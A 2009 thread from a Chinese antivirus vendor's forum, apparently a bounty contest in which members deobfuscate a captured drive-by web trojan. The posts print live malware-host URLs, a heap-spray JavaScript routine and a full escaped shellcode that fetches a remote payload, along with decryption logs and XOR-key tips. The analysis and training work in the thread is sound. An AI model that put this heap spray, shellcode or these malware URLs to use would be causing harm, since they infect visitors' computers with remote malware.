网马解密悬赏第三十三期（已结束） bbs.ikaka.com

瑞星卡卡安全论坛

networkedition - 2009-9-25 11:05:00

引用:

http://temphk5.myz.info/9net/content.html

引用:

规则：1.一次解完并附解密日志和步骤（包含swf和pdf网马），奖赏10威望，如果部分解出，每步奖赏2威望；
2.对于积极参与此活动会员，并多次中奖者，我们可以诚邀加入卡卡反病毒小组

引用:

解密工具：
Freshow（中文版）
Redoce（中文版）
Malzilla （汉化版）

引用:

在线解析站点：
http://glacierlk.cn/openlab/jm.htm
[url=http://www.cha88.cn/

http://www.cha88.cn/[/quote[/url]]

引用:

注：卡卡反病毒小组和版主等不允许参加，网址如失效，使用附件内容进行解密

引用:

恶意网址来源瑞星全功能安全软件拦截到真实有效的地址

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

附件: content.rar

damiwho - 2009-9-25 15:51:00

http://219.90.115.239/9net/f/faint.jpg 最后的一个结果

恶意链接地址禁用url

damiwho - 2009-9-25 15:52:00

<textarea>http://219.90.115.239/9net/f/faint.jpg</textarea>

king1636 - 2009-9-25 16:07:00

该用户帖子内容已被屏蔽

天涯浪子1988 - 2009-9-25 18:21:00

关于:hxxp://temphk5.myz.info/9net/content.html解密的日志(全体输出 - 4):

Level 0>http://temphk5.myz.info/9net/content.html
Level 1>http://temphk5.myz.info/9net/ff23-ie7-xp.swf
Level 1>http://temphk5.myz.info/9net/done.swf（无法下载）
Level 1>http://219.90.115.239/9net/f/faint.jpg

日志由 Redoce2.0第45次修正版于 2009/9/25 18:09:23 生成。

另外提醒下版主你给的那个在线解密网址似乎已经过期了现在用这个http://issmall.isgreat.org/

kankanhai - 2009-9-25 18:23:00

Log is generated by FreShow.
[wide]http://temphk5.myz.info/9net/content.html
[object]http://mstsc2005.com/qq.exe

redbsd - 2009-9-25 18:25:00

唉，试了几种方法都找不到链接；
我说下我的方法吧：
1.代码里有个eval ,把它改成alert,弹出一个框，内容如下：
---------------------------
Microsoft Internet Explorer
---------------------------
var nop = unescape("%u9090%u9090");
var ptr1 = unescape("%u0e00%u0e00");
var ptr2 = unescape("%u0f80%u0f80");

var array = new Array();

SCSC = unescape(SCSC.replace(/%uzv/g, "%u"));
var fill1 = makevtable(ptr1, ptr2, nop, SCSC);

for (i = 0; i < 220; i++)
{
array = fill1 + 'a';
}
---------------------------
确定
---------------------------

然后把“%uzv”替换成%u,然后两次ESC后也不能将其解出，当然不替换直接解这个SHELLCODE也不行；

2.还有那些十进制的数也看了一下，应该没有问题；

3.这段代码也没有发现其他的解马关键字；
期盼着请高手解答。

天涯浪子1988 - 2009-9-25 18:29:00

引用:

原帖由 redbsd 于 2009-9-25 18:25:00 发表
唉，试了几种方法都找不到链接；
我说下我的方法吧：
1.代码里有个eval ,把它改成alert,弹出一个框，内容如下：
---------------------------
Microsoft Internet Explorer
---------------------------
var nop = unescape("%u9090%u9090");
va

第二次esc前输入0xC密钥十进制解出来是告诉我们上面的shellcode用“%uzv”替换成%u,

redbsd - 2009-9-25 18:30:00

高手们解下版主发的这个文件里的代码吧，“content.rar”

zjmuye - 2009-9-25 20:20:00

回错帖子了

附件: 未命名.jpg

king1636 - 2009-9-25 20:48:00

该用户帖子内容已被屏蔽

zhang5876246 - 2009-9-26 0:23:00

不明白~饿是菜鸟

redbsd - 2009-9-26 0:30:00

方法：
1.先用%uzv替换成%u
2.ESC第二次解密时，输入密钥0xC,即可解出http://219.90.115.239/9net/f/faint.jpg

redbsd - 2009-9-26 0:37:00

有一点还不是很清楚啊，密钥0xC是怎么得来的？只找到f5 和98密钥，但这个都不能解出。
版主指点下啊。3Q

天涯浪子1988 - 2009-9-26 8:04:00

引用:

原帖由 redbsd 于 2009-9-26 0:30:00 发表
方法：
1.先用%uzv替换成%u
2.ESC第二次解密时，输入密钥0xC,即可解出

建议复杂点的解密用redoce 神器之类的软件解密 freshow功能上有些不足而且长期不跟新像这个就是用redoce的“Xor密钥寻找”功能找到的当然高手门可以通过调试解出来这里的0xC表示十六进制的c 所以你输入c作为密钥也是可以的

redbsd - 2009-9-26 18:49:00

楼主，多谢你。
不过我用redoce的“Xor密钥寻找”，找不到密钥。
我的方法：
先用%uzv替换成%u，然后再用redoce的“Xor密钥寻找”功能，可就是找不出。不替换也找不出。不知道为什么，楼主们明示。3Q

是昔流芳 - 2009-9-26 19:09:00

孔子，悬赏应该已经步入尾声，我可以说说我的办法了吧？

我先说说我的办法吧。

[复制到剪贴板]

CODE:

var nop = unescape("%u9090%u9090");
var ptr1 = unescape("%u0e00%u0e00");
var ptr2 = unescape("%u0f80%u0f80");

var array = new Array();

SCSC = unescape(SCSC.replace(/%uzv/g, "%u"));
var fill1 = makevtable(ptr1, ptr2, nop, SCSC);

for (i = 0; i < 220; i++)
{
array[i] = fill1 + 'a';
}

根据这一段来看，还是把ptr1, ptr2, nop, SCSC合并起来比较好，不至于缺失然后把SCSC中的%uzv替换成%u，这样就可以得到一段Shellcode。

[复制到剪贴板]

CODE:

%u0e00%u0e00%u0f80%u0f80%u9090%u9090%ue860%u0039%u0000%uc689%uc681%u0071%u0000%uc789%uc781%u0049%u0000%u65ba%u0002%u3100%u31c9%u83db%u02c3%u048a%u301f%u0e04%u3941%u0fd1%u0883%u0000%u0100%u43db%ue383%ueb1f%u61e9%u32e9%u0000%ue800%u0000%u0000%u8358%u44e8%u84c3%ue17b%ue886%ud16f%u8579%u5319%uc395%u1947%u857d%u8f7e%u8580%uf598%u857a%u0d1a%u0fe1%u897c%u440c%u2233%u8811%u6677%u8155%u1c3a%ufc9f%u5ce0%u0c08%ue40c%u0d80%u0c0c%ucc89%u8803%u0d76%u0c0c%u4985%ub5f0%uf72f%ufb9d%u5187%ue4f0%u0dad%u0c0c%ucc89%u8803%u0d6e%u0c0c%u348c%u03cf%u0f88%u0c0c%u4c0c%uf8e7%u4985%ub5f4%uf294%u0286%u5187%ue4f0%u0d71%u0c0c%ucc89%u8803%u0d32%u0c0c%u4985%ub5f8%u4282%ue002%u5187%ue4f0%u0d69%u0c0c%ucc89%u8803%u0d2a%u0c0c%u4985%ub5fc%ua56f%ufeed%u5187%ue4f0%u0d41%u0c0c%ucc89%u8803%u0d02%u0c0c%u4985%ue4e0%uf34f%uf3f3%ucf85%ucf8d%u0d29%u0c0c%uf35f%uf479%u79f3%uf3f4%uf479%u79f3%uf3f4%uf479%ucf85%ucf8d%u0e90%u0c0c%uf35f%uf479%u4987%uf3fc%u89ec%u03cc%ud988%u0c0c%u850c%ue849%u3ab5%u2316%u877c%ue851%uf0e4%u0c0c%u890c%u03cc%ub188%u0c0c%u850c%uec49%u2c64%u0c0e%u810c%ucc81%uf3f7%u5df3%ueae4%uf3f2%u85f3%u8dcf%uabcf%u0c0e%u5f0c%u59f3%u81e0%ucc81%uf3f7%u86f3%u4d0d%ucc88%uf579%uca45%u500d%u4dca%u790d%u4dca%u7c0e%u4dca%u780f%u4dca%u2208%u4dca%u6909%u4dca%u740a%u4dca%u690b%u4dca%u0c04%ua8e4%uf3f2%u85f3%u8dcf%udecf%u0c0d%u5f0c%u79f3%uf3f4%uf479%u79f3%uf3f4%uf479%u79f3%u3df4%u5dc5%u815d%ucc81%uf3f7%u5df3%ucf85%ucf8d%u0ea3%u0c0c%u3d5f%u5ccc%u79f3%u87f4%uec49%uecf3%u64e4%uf3f2%u85f3%u8dcf%u0ecf%u0c0e%u5f0c%u79f3%uf3f4%uf479%u79f3%uf3f4%uf479%u79f3%u3df4%u4dc5%u815d%ucc91%uf3f7%u5ff3%u79f3%u87f4%uf849%uecf3%u6dc5%ucc3d%u3d4c%ucef3%u0c08%u685a%u3cad%u0c0c%u870c%u004c%u7c87%ua110%u4c87%u5204%u5bcf%ucc3d%uf33d%ua0f0%ucc88%u8803%u0c0b%u0c0c%uc3cd%u0d01%ue7cb%u85fc%u53f4%u5acf%u8f5e%u04e0%u0085%u8528%u0fd4%u304c%u4487%u0d74%u87d5%u184d%u4885%u0828%u4d87%u0d2c%u3dd4%u87de%u9c38%ud20d%ue45c%uf3b7%uf3f3%u4837%u0828%u0354%u1289%u0c0c%u870c%u284d%ud40d%u876a%u5c18%uee8d%uf3f3%u0c0c%u4d87%u0d10%u87d4%u9c08%ud40d%u05e5%u0c0c%u4e0c%u5837%u0828%uc97e%ucc3d%uc88f%u5204%ucf56%u7e79%u6160%u6263%u6822%u6060%u4d0c%u5c5c%u4d48%u4d58%u640c%u7878%u367c%u2323%u3d3e%u2235%u3c35%u3d22%u393d%u3e22%u353f%u3523%u6962%u2378%u236a%u6d6a%u6265%u2278%u7c66%u0c6b

将这段代码复制到http://issmall.isgreat.org/autoxor.htm中，AutoXor后弹出XOR KEY:0x0，点击Decode，即可解出。

天涯浪子1988 - 2009-9-26 19:23:00

先“5>Unicode清除(%u,\u)(参数/无参数)” 解出来的是谁也看不懂的乱码然后再xor密钥寻找

天涯浪子1988 - 2009-9-26 19:26:00

引用:

原帖由 是昔流芳 于 2009-9-26 19:09:00 发表
孔子，悬赏应该已经步入尾声，我可以说说我的办法了吧？

我先说说我的办法吧。[code]var nop = unescape("%u9090%u9090");
var ptr1 = unescape("%u0e00%u0e00");
var ptr2 = unescape("%u0f80%u0f80");

var array

原来networkedition 是孔子啊汗一直不知道呢难怪上次悠悠我心说network也是剑盟的管理员:kaka6: 失敬失敬啊:kaka12:

shadowmin - 2009-9-26 22:42:00

合并完了，有500多K
处理起来特慢

redbsd - 2009-9-26 23:50:00

谢谢你天涯浪子1988，也谢谢是昔流芳，你的方法很好

networkedition - 2009-9-27 9:21:00

用freshow的enumxor功能也可以解密出。

查看完整版本: 网马解密悬赏第三十三期（已结束）